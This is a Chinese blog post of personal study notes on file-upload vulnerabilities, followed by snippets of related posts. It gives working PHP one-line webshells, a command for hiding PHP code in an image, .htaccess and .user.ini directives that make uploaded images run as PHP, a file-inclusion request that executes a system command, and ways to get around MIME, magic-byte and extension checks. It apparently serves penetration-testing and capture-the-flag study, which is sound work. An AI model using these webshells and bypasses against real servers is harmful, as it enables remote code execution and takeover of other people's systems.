文件上传漏洞总结

已于 2022-02-12 15:14:54 修改
阅读量3.2k 收藏 6
点赞数 4
文章标签: 前端 web安全 php
于 2022-02-12 15:08:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61991235/article/details/122896839
版权

目录

文件上传漏洞总结

原理

危害

webshell(网页木马文件)

大马

小马

图片马

前端验证(客户端javascript验证)

前端验证绕过

后端验证(服务端验证)

服务端MIME类型验证(文件内容类型检测)

服务端文件内容验证-文件头

服务端文件扩展名验证

常用

.htaccess

.user.ini

常见一句话写法

注:菜鸡笔记,酌情参考!

原理

在开发时没有对用户上传的文件进行严格的检测,过滤,导致用户可以上传可执行脚本文件(恶意文件),导致可以执行服务端命令

危害

获取服务器的控制权

可以上传相同文件名的文件来覆盖原有文件

容易受到目录遍历的攻击;

拒绝服务 (DoS) 攻击....

webshell(网页木马文件)

最常见的文件上传漏洞的方法是上传网站木马(webshell)文件,WEBSHELL又称网页木马文件,根据开发语言的不同又分为ASP木马、PHP木马、JSP木马等,该类木马利用了脚本语言中的系统命令执行、文件读写等函数的功能,一旦上传到服务器被脚本引擎解析,攻击者就可以实现对服务器的控制。

webshell分为大马,小马(一句话木马)和图片马

大马

功能比较全,但代码量大,相对复杂,不容易隐藏,一般需要加密等手段来进行隐藏

小马

功能简单,代码少,隐蔽性强

图片马

网站只允许上传图片(.png .jpg .gif) ,且无法绕过时,可利用图片马

制作图片马:cmd中输入命令:copy 图片.jpg/b+木马.php/a 图片.jpg

目录

目录

原理

危害

webshell(网页木马文件)

大马

小马

图片马

前端验证(客户端javascript验证)

前端验证绕过

后端验证(服务端验证)

服务端MIME类型验证(文件内容类型检测)

服务端文件内容验证-文件头

服务端文件扩展名验证

常用

.htaccess

.user.ini

常见一句话写法

前端验证(客户端javascript验证)

主要检测文件后缀,大致分为:

  • 黑名单:不允许上传的文件

  • 白名单:允许上传的文件

  • 前端对上传文件有限制时是可以直接修改代码

    eg:  lay-data="{url: 'upload.php', accept: 'images',exts:'png'}
      改为:lay-data="{url: 'upload.php', accept: 'file'}

前端验证绕过

  • 在浏览器设置中关闭Javascript

  • bp抓包修改(比如先上传1.jpg文件,再抓包后改为1.php

后端验证(服务端验证)

服务端MIME类型验证(文件内容类型检测)

MIME类型是描述消息内容类型的因特网标准

主要为Content-Type:

当对文件内容有限制时,可以将Content-Type:application/octet-stream等改为:

Content-Type:image/jpeg

Content-Type:image/png

Content-Type:image/gif

服务端文件内容验证-文件头

后端会检测上传文件的内容

图片格式检查文件内容是通过检查文件开头的一段二进制,不同的图片类型,文件头是不同的。

绕过方法:

一,在文件前添加文件幻术头,对图片类容进行欺骗

常见文件幻术头:GIF89a

  • JPG: FF D8 FF EO 00 10 4A 46 49 46.

  • GIF:47 49 46 3839 61(GIF89a).

  • PNG:89 50 4E 47

二,利用服务器将木马文件解析成了图片文件,因此向其发送执行该文件的请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。

因此利用文件包含漏洞,可以将图片格式的文件当作PHP文件来解析执行

.php?filename=uploads/1.jpg&pass=system('cat /flag')
​

服务端文件扩展名验证

.php?filename=uploads/1.jpg&pass=system('cat /flag')

后端对文件的扩展名进行了过滤后,所上传的文件后缀进行筛选

绕过方法:

  • 后缀名大小写

  • 同义后缀名替换

php: php、 phtml、php3、php4、php5  
​
jsp: jap、jspx、jspf 
​
asp: asa、cer、aspx
​
ext: exee
​

  • 双写绕过:php -> phphpp

常用

.htaccess

参考:原文链接:深究用户利用.htaccess的原理篡改配置导致的安全问题_合天网安学院-CSDN博客

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的''AllowOverride''指令来设置。这里简明扼要的说一下,.htaccess说白了就是apache服务器中的一个配置文件;只不过它负责的是相关目录之下的网页配置;

htaccess文件作用:

  • 网页301重定向

  • 自定义404错误页面

  • 改变文件拓展名

  • 禁止目录列表等等

因此可以利用写入.htacess文件内容:    

<FilesMatch "s1mple"> //使名为s1mple的文件当作php格式解析
Sethandler application/x-httpd-php
</Filesmatch >
    
 或者:
AddType application/x-httpd-php .jpg //将jpg文件当作php格式解析

.user.ini

参考:文件上传之.htaccess和.user.ini_m0_46587008的博客-CSDN博客

.user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。

.user.ini文件作用: 可以改变用户读取文件和包含文件的权限等,它的使用范围更广,但是条件多了一个(比较重要的)对应目录下有可执行文件。接下来我们看如何构造这两种配置文件。

auto_prepend_file=a.jpg //在木马前传入
auto_append_file=a.jpg  //在木马后传入

常见一句话写法

 <?php @eval($_POST["pass"]);?> 
​
<script language='php'>assert($_REQUEST['pass'])</script>
     
<script language="php">eval($_POST['pass'])</script>
                                   
<scriptlanguage="php">eval($_REQUEST['pass'])</script>

K4i_x3i0
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传文件漏洞总结
01-10
上传文件总结上传文件总结上传文件总结上传文件总结
文件上传漏洞-04】服务器端检测与绕过实例(包含MIME类型、后缀名、文件内容)
m0_64378913的博客
05-31 1477
目录1 相关基础知识1.1 MIME类型检测概述1.1.1 概述1.1.2 文件格式1.1.3 检测与绕过1.2 后缀名检测概述1.3 文件内容检测概述1.3.1 简介1.3.2 图片马的制作方法2 实例操作环境及前期准备简历2.1 操作环境2.2 前期准备3 MIME类型检测与绕过实例4 文件后缀名检测与绕过实例5 文件内容检测与绕过实例6 总结 1 相关基础知识 1.1 MIME类型检测概述 1.1.1 概述 定义:MIME(Multipurpose Internet Mail
文件上传绕过的一些姿势
weixin_37104668的博客
03-12 1157
WAF绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name=“file”; filename=“ian.php” 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name=“file”; ...
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
weixin_39528525的博客
12-29 1万+
1.什么是webshellWebweb服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
文件上传漏洞原理、防御、绕过
qq_43455259的博客
05-31 3520
文件上传漏洞原理 文件上传漏洞防御 文件上传漏洞防护绕过
文件上传漏洞
qq_63969018的博客
04-09 909
文件上传漏洞姿势
文件上传常见绕过
since_2020的博客
08-05 871
文件上传常见PHP后缀 php2, php3, php4, php5, phps, pht, phtm, phtml
web漏洞文件上传的三种安全级别入侵
qq_45886782的博客
10-19 5808
1编写一句话木马 2对DVWA的low模式进行文件上传,直接上传shell文件,上传成功 3使用菜刀连接,连接成功 4 设置代理 5 进行DVWA的medium模式下文件上传,使用brupsuite抓包修改文件类型为image/jpeg 6 文件上传成功 7进行DVWA的high模式下文件上传,在windows向图片中添加php木马 8使用burpsuit抓包修改文件名,上传成功 10使用菜刀连接,连接成功 ...
文件上传漏洞绕过手段
热门推荐
18年3月萌新白帽子
06-12 1万+
文件上传漏洞的成因:1.服务器的错误配置2.开源编码器漏洞3.本地上传上限制不严格被绕过4.服务器端过滤不严格被绕过常见上传检测流程2.文件上传漏洞的危害(1)网站被控制(2)服务器沦陷(3)同服务器的其他网站沦陷3.客户端验证检测可以看到客户端代码中使用了javascript语言进行了简单的文件后缀名判断这个时候我们只需要将本机浏览器的javascript模块禁用就可以使该段代码不被解析执行。在...
表示不同文件类型的魔术数字【整理】
码农的田园
08-03 1万+
这里所说的表示不同文件类型的魔术数字,指定是文件的最开头的几个用于唯一区别其它文件类型的字节,有了这些魔术数字,我们就可以很方便的区别不同的文件,这也使得编程变得更加容易,因为我减少了我们用于区别一个文件文件类型所要花费的时间。 比如,一个JPEG文件,它开头的一些字节可能是类似这样的”ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ……JFIF…..G“,
文件上传漏洞的思维导图
04-19
总结文件上传漏洞的相关知识
上传攻击漏洞总结
06-12
文件介绍了主流的文件上传漏洞,以及如何绕过文件检测来达到上传的目的。
javaWeb安全验证漏洞修复总结
08-26
目前很多业务都依赖于互联网,例如说网上银行、网络购物、网游等,很多恶意...同时,对Web服务器的攻击也可以说是形形色色、种类繁多,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。
上传漏洞总结(私人珍藏)
12-31
好东西和大家分享啦,私人珍藏宝贝,全部上传漏洞总结
前端】数组的常用处理函数
lcukyNwa的博客
04-22 436
item------->每个元素值 (必)index----->索引(可选)arr-------- >当前数组(可选)推荐vscode的一款插件来写以下的demo,该插件可以直接在js文件中显示结果,搜 Quokka.js用这个插件去新建一个js文件,直接就运行在node上了forEach不会返回一个新的数组,里面改值会影响原数组,其他方法不影响原数组map可以返回新数组 用于映射,如每个元素都加倍或执行其他转换操作every返回一布尔值,需数组中全部满足。
C++ WebServer的细节理解
我的博客
04-22 617
在非阻塞模式下,如果 I/O 操作不能立即完成(例如,因为没有数据可读 或 写缓冲区满),系统不会让调用进程阻塞等待,而是立即返回一个错误(通常为 EAGAIN 或 EWOULDBLOCK)。先查询文件描述符 fd 当前的标志,然后将 O_NONBLOCK 标志加入其中,并通过 F_SETFL 来更新文件描述符,最终实现将该文件描述符切换为非阻塞模式。这意味着,如果没有待处理的连接请求(即没有客户端尝试连接到服务器),accept() 会一直阻塞,直到有新的连接请求到达或发生其他特定条件(如超时)为止。
SpringBoot项目打包分离高阶操作
Record Little
04-23 650
虽然传输jar包 比较大,但是安全性、稳定性比较高,不需要关注pom.xml 添加了新的依赖、更新了版本号等等影响版本功能的操作。关注maven的特性, profiles即可满足, 根据不同的activation 状态,激活不同的build操作。每次修改一小部分代码或仅仅更新某个依赖jar包时,都需要重新进行整个项目的构建、打包、上传和部署。但是当你的项目趋于稳定,只有业务上的逻辑变更时,如果使用分离版本,可以加快迭代、更新的速度。弊端: 需要配置IDE命令,修改依赖时需要同时修改2处。
Vue-router的动态路由:获取传递的值
woliuhuaqiangla的博客
04-22 408
Vue.js是一款流行的JavaScript框架,用于构建单页面应用程序。它提供了许多有用的功能,其中之一是Vue-router,它允许您轻松地管理应用程序的路由。Vue-router支持动态路由,这意味着您可以在路由中使用变量,并在组件中访问它们。本文将介绍如何定义Vue-router的动态路由,以及如何获取传递的值。动态路由的优缺点动态路由是指根据特定的参数来动态地生成路由,这在使用Vue-router时是非常常见的。
docker部署前端项目(二)遇到的问题
最新发布
weixin_45379180的博客
04-25 334
原因: 安装docker的时候使用的是 yum -y install docker 命令,这个命令安装的是老版本。报错四:conflicts with file from package docker-common。因为使用 sudo yum install docker (下载到的是旧版)missing signature key 缺少秘钥。yum remove docker 删除docker。1、docker版本号 只有1.13.1。解决:可能是docker 未启用。
文件上传漏洞 找绝对路径
07-27
文件上传漏洞是指在网站或应用程序中存在漏洞,使得攻击者可以上传恶意文件到服务器上。通过利用文件上传漏洞,攻击者可以执行任意代码,获取服务器权限,或者在服务器上执行其他恶意操作。 要找到文件上传漏洞的绝对路径,可以通过以下步骤进行: 1. 首先,尝试上传一个文件,观察上传的文件是否被服务器接受并保存。如果上传成功,可以尝试修改文件的扩展名或内容,以绕过服务器的文件类型检查。这样可以确保上传的文件能够被服务器执行。 2. 上传成功后,需要找到上传文件的绝对路径。可以通过查看上传文件的URL或文件路径来获取。通常,上传的文件会被保存在服务器的特定目录中,可以通过查看服务器配置文件或应用程序代码来确定上传文件的保存路径。 3. 一旦找到上传文件的绝对路径,可以使用蚁剑等工具来连接服务器并执行代码。通过连接服务器,可以利用上传的文件执行任意代码,获取服务器权限或进行其他操作。 需要注意的是,为了使上传的文件能够被服务器执行,通常需要将文件的扩展名修改为服务器支持的脚本语言类型,如PHP。这样服务器在执行文件时会将其作为脚本来解析并执行其中的代码。 总结起来,要找到文件上传漏洞的绝对路径,需要通过上传文件并修改扩展名或内容来绕过服务器的文件类型检查,然后查找上传文件的保存路径,并使用相应的工具连接服务器并执行代码。 #### 引用[.reference_title] - *1* *2* *3* [文件上传漏洞详解](https://blog.csdn.net/2301_76160896/article/details/131215650)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值